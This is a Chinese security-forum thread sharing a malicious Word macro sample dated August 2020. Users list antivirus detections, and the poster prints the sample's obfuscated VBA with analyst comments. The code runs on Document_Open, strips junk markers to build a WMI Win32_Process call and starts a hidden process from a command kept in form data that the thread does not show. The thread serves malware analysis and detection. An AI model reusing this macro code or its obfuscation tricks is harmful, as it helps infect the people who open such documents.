
[病毒样本] #Macro enabled text document# (2020-8-19)

Kaspersky用户
发表于 2020-8-19 12:25:21 | 显示全部楼层
Avira高启发监控KILL

VBA/Dldr.Agent.ulyfz
anthonyqian
发表于 2020-8-19 12:33:57 | 显示全部楼层
诺顿

文件名: Form - Aug 13_ 2020.doc
威胁名称: ISB.Downloader!gen411
浪里个浪9527
发表于 2020-8-19 13:49:44 | 显示全部楼层

非正规ID
发表于 2020-8-19 20:26:18 | 显示全部楼层
火绒miss了 这个 我没设置好么

川建国代理人
 楼主| 发表于 2020-8-19 21:33:49 | 显示全部楼层
非正规ID 发表于 2020-8-19 20:26
火绒miss了 这个 我没设置好么

这是样本的两组宏代码
  ' Routine called from Document_open. It rebuilds obfuscated strings, creates two
  ' objects from them and calls .Create on the first one. No return value is assigned.
  ' NOTE(review): identifiers containing U+FFFD are extraction damage. The scattered
  ' Dim / Trim$ / "Do While ... DoEvents" fragments only touch locals that are never
  ' read again in this listing, so they look like filler meant to pad the macro.
  1. Function IMDJUpaeopphltw()
  ' Reads the .Zoom property of GVNCMjuwrsfqdhfvrt (presumably a UserForm in the
  ' document; the form itself is not shown on the page).
  2. NINEDrrlcnonxg = GVNCMjuwrsfqdhfvrt.Zoom
  3. Dim EWtaT3�EfeU As Integer
  4. EWtaT3�EfeU = 9
  5. Do While EWtaT3�EfeU < 9 + 4
  6. EWtaT3�EfeU = EWtaT3�EfeU + 6: DoEvents
  7. Loop
  ' (100 + 35) / 9 = 15, so this is ChrW(Zoom + 15). If Zoom is the UserForm default
  ' of 100 the result is ChrW(115) = "s" -- assumption, confirm against the form.
  8. BDLTVgidtlppbf = ChrW(NINEDrrlcnonxg + (100 + 35) / 9)
  9. Dim WHEWC0�GtsV As String
  10. WHEWC0�GtsV = Trim$("NZtncF7�")
  ' Every literal fragment below is separated by the junk marker
  ' "832[sahj hui12t7gGG7&^6272 gasg671". With the marker removed the fixed pieces read
  ' "winmgmt" + <char computed above> + ":win32_" + <form value VNMSCbhkbswxd> + "rocess".
  ' Presumably this is the WMI moniker for the Win32_Process class; the two inserted
  ' values are not visible on the page -- TODO confirm from the form data.
  11. GSBAGyjqcarlijtzov = "832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671w832[sahj hui12t7gGG7&^6272 gasg671i832[sahj hui12t7gGG7&^6272 gasg671nm832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671gm832[sahj hui12t7gGG7&^6272 gasg671t832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671" + BDLTVgidtlppbf + "832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671:832[sahj hui12t7gGG7&^6272 gasg671w832[sahj hui12t7gGG7&^6272 gasg671in832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg6713832[sahj hui12t7gGG7&^6272 gasg6712832[sahj hui12t7gGG7&^6272 gasg671_832[sahj hui12t7gGG7&^6272 gasg671" + GVNCMjuwrsfqdhfvrt.VNMSCbhkbswxd + "832[sahj hui12t7gGG7&^6272 gasg671ro832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671ce832[sahj hui12t7gGG7&^6272 gasg671s832[sahj hui12t7gGG7&^6272 gasg671s832[sahj hui12t7gGG7&^6272 gasg671"
  12. Dim Xw3�8�Ky1�w As Byte
  ' LJZNQeocxzskhgk splits on the marker and re-joins, yielding the clean string.
  13. JTRGZuudmaoe = LJZNQeocxzskhgk(GSBAGyjqcarlijtzov)
  14. Dim KUm3Y4�w0�A As Integer
  15. KUm3Y4�w0�A = 4
  16. Do While KUm3Y4�w0�A < 4 + 8
  17. KUm3Y4�w0�A = KUm3Y4�w0�A + 8: DoEvents
  18. Loop
  ' First object: created from the decoded string. Its .Create method is called below.
  19. Set XELFNsanjmetbgvs = CreateObject(JTRGZuudmaoe)
  20. Dim QXD As String
  21. QXD = Trim$("DHBnPjfiN")
  ' Form controls' ControlTipText is used as string storage. The values live in the
  ' document's form data, not in the macro source, so they are not visible here.
  22. SFFGKnkzerisyyxloed = GVNCMjuwrsfqdhfvrt.YUJPTwbpnlntxrvohod.ControlTipText
  23. Dim m1�kpiV8�N As Variant
  ' SOJSRvsicutkiygw is never assigned in the visible listing. The rest concatenates
  ' the decoded string, the computed char and two ControlTipText values.
  24. MBDSHnxlzsgukznbr = SOJSRvsicutkiygw + (JTRGZuudmaoe + BDLTVgidtlppbf + GVNCMjuwrsfqdhfvrt.FZYKUjobbfsndyy.ControlTipText + SFFGKnkzerisyyxloed)
  25. Dim gs2�gnTcKiQ As String
  26. YRAEKhnpdofs = MBDSHnxlzsgukznbr + GVNCMjuwrsfqdhfvrt.VNMSCbhkbswxd
  27. Dim N0�Pb8� As Double
  ' Second object: created by the helper, which also sets its showwindow property.
  ' Presumably a WMI process-startup configuration object -- TODO confirm.
  28. Set DYWLWkdanjkucwoh = HAMVVfxmbsedquponf(YRAEKhnpdofs)
  29. Dim GqCGSFodc As String
  30. GqCGSFodc = Trim$("Mv1�f8�oY4�")
  ' The Array(...) wrapper exists only to evaluate its middle element, the .Create call:
  '   arg 1 = string returned by HHBPMawuqhwypo (decoded from a form Tag value),
  '   arg 2 = VHKNTrsqekls, never assigned in the visible listing,
  '   arg 3 = the object built by the helper above.
  ' If the first object is Win32_Process, this starts the decoded command line through
  ' WMI, so the new process would not be a child of Word. For detection, look at
  ' processes started by the WMI provider host shortly after a document is opened.
  31. LHNTPvakhsrbzzlo = Array(GXEKFlkuwnam + "CUKLXkcvdtjhkda DVIWGsjsdfwdzs ZXWPXqocblhdev", XELFNsanjmetbgvs. _
  32. Create(HHBPMawuqhwypo, VHKNTrsqekls, DYWLWkdanjkucwoh), ROYWKkjknncqot + "KYPEXakotlyqgg FLXGKmmlstlshuhxe")
  33. Dim ZWpUHiEAD As String
  34. ZWpUHiEAD = Trim$("VabiuX")
  35. End Function
  ' Helper: creates the object named by its argument, sets that object's showwindow
  ' property, and returns the object to the caller.
  36. Function HAMVVfxmbsedquponf(APCZVessorwgiiclkvk)
  37. Set HAMVVfxmbsedquponf = CreateObject(APCZVessorwgiiclkvk)
  ' Filler: the counter runs from 9 to 14 with DoEvents and is not read afterwards.
  38. Dim yllcsJLnKV As Integer
  39. yllcsJLnKV = 9
  40. Do While yllcsJLnKV < 9 + 5
  41. yllcsJLnKV = yllcsJLnKV + 1: DoEvents
  42. Loop
  ' Neither operand is assigned anywhere in the visible listing, so the sum is
  ' presumably 0. On a WMI process-startup object that value would request a hidden
  ' window -- TODO confirm.
  43. HAMVVfxmbsedquponf. _
  44. showwindow = LGFVGuhhafllucdwirs + IUXNWlmiculntr
  45. Dim a4�g As Object
  46. End Function
  ' String decoder: removes the junk marker from its argument and returns the result.
  ' The marker literal below appears unchanged throughout this sample, so it may serve
  ' as a static match string for this document (hedged: only this sample is visible).
  47. Function LJZNQeocxzskhgk(WIMPPhqhyyiiuo)
  48. IGUZVdybluwpxheflc = WIMPPhqhyyiiuo
  49. Dim nGcyUDpZ As Byte
  ' Split the input on the marker.
  50. BRRDNiufmwunj = Split _
  51. (IGUZVdybluwpxheflc, "832[sahj hui12t7gGG7&^6272 gasg671")
  52. Dim EA4�DwC5�rtA As Double
  ' Re-join the pieces. Both the Join separator (QRIRYviyeguxrcickym) and the prefix
  ' (ALKEDzdmhahzipllpe) are never assigned in the visible listing, so the pieces are
  ' presumably concatenated with nothing in between -- TODO confirm.
  53. TDQUBtrdlaref = ALKEDzdmhahzipllpe + Join(BRRDNiufmwunj, QRIRYviyeguxrcickym)
  54. Dim C7�Yg As String
  55. C7�Yg = Trim$("nCtJBfnGcy")
  56. LJZNQeocxzskhgk = TDQUBtrdlaref
  57. Dim kFPSyh As Object
  58. End Function
  ' Returns the decoded .Tag text of a page in the form control TGYNXmnrevkohuwrk.
  ' IMDJUpaeopphltw passes this return value as the first argument of its .Create call.
  ' The Tag content is stored in the document's form data and is not on the page.
  ' NOTE(review): to recover it, extract the form streams offline with a macro-analysis
  ' tool (e.g. olevba / oledump) rather than opening the document.
  59. Function HHBPMawuqhwypo()
  ' Filler assignments to locals that are never read again.
  60. Dim ctRwWF As String
  61. ctRwWF = Trim$("dJSt4�f")
  62. Dim Hd2EFS7�2�e As String
  63. Hd2EFS7�2�e = Trim$("X8�CfRdv")
  64. Dim gbdGcnr As String
  65. gbdGcnr = Trim$("kYI")
  ' vbOK is the VBA constant 1, used here only as a page index.
  66. LJDODikarcwpjfelr = GVNCMjuwrsfqdhfvrt.TGYNXmnrevkohuwrk.Pages(vbOK).Tag
  67. Dim AhGo2�Y3�bo As String
  68. AhGo2�Y3�bo = Trim$("yo3�dOZdWK")
  ' Strip the junk marker via the decoder and return the cleaned string.
  69. HHBPMawuqhwypo = LJZNQeocxzskhgk(LJDODikarcwpjfelr)
  ' Filler loop: one iteration with DoEvents, counter not read afterwards.
  70. Dim B0�jUg As Integer
  71. B0�jUg = 9
  72. Do While B0�jUg < 9 + 1
  73. B0�jUg = B0�jUg + 1: DoEvents
  74. Loop
  75. End Function
  ' Auto-run hook: Word calls Document_Open when the document is opened with macros
  ' enabled. Its only action is to call IMDJUpaeopphltw on GVNCMjuwrsfqdhfvrt.
  ' The line continuation splits the "Private Sub Document_open" header across two
  ' lines, presumably to break simple single-line string matching on it.
  1. Private Sub _
  2. Document_open()
  3. GVNCMjuwrsfqdhfvrt.IMDJUpaeopphltw
  4. End Sub
打开文档时一般都会报错,但其实宏在 Document_open 时已经执行,系统已经被感染了。
